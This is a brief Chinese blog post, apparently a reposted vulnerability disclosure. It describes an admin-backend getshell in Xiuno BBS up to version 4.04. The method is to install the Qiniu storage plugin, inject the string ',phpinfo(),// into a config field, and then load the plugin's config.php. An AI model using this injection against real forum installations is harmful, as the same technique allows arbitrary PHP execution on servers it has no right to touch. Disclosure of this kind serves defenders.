xiuno最新后台Getshell
2019-10-08 15:58:16 Author: www.safeinfo.me(查看原文) 阅读量:503 收藏

发表于 | 分类于 |

字数统计: 165 | 阅读时长 ≈ 1


前言

Xiuno BBS 4.0 是一款轻论坛产品,前端基于 BootStrap 4.0、JQuery 3,后端基于 PHP/7 MySQL XCache/Yac/Redis/Memcached…

自适应手机、平板、PC,有着非常方便的插件机制,不仅仅是一个轻论坛,还是一个良好的二次开发平台。

本想把前台的洞也发出来 但是利用方法有点偏激 所以只写后台 漏洞影响至最新4.04版本

正文

进入后台-插件-下载七牛云存储 下载安装完成 如下图

随后 随便在一个配置里面插入 ',phpinfo(),//

随即访问

http://127.0.0.1//plugin/yb_qiniu/config.php

Fi9Coder wechat

扫一扫,加入信安圈。

0%


文章来源: https://www.safeinfo.me/2019/08/20/xiuno%E6%9C%80%E6%96%B0%E5%90%8E%E5%8F%B0Getshell.html
如有侵权请联系:admin#unsafe.sh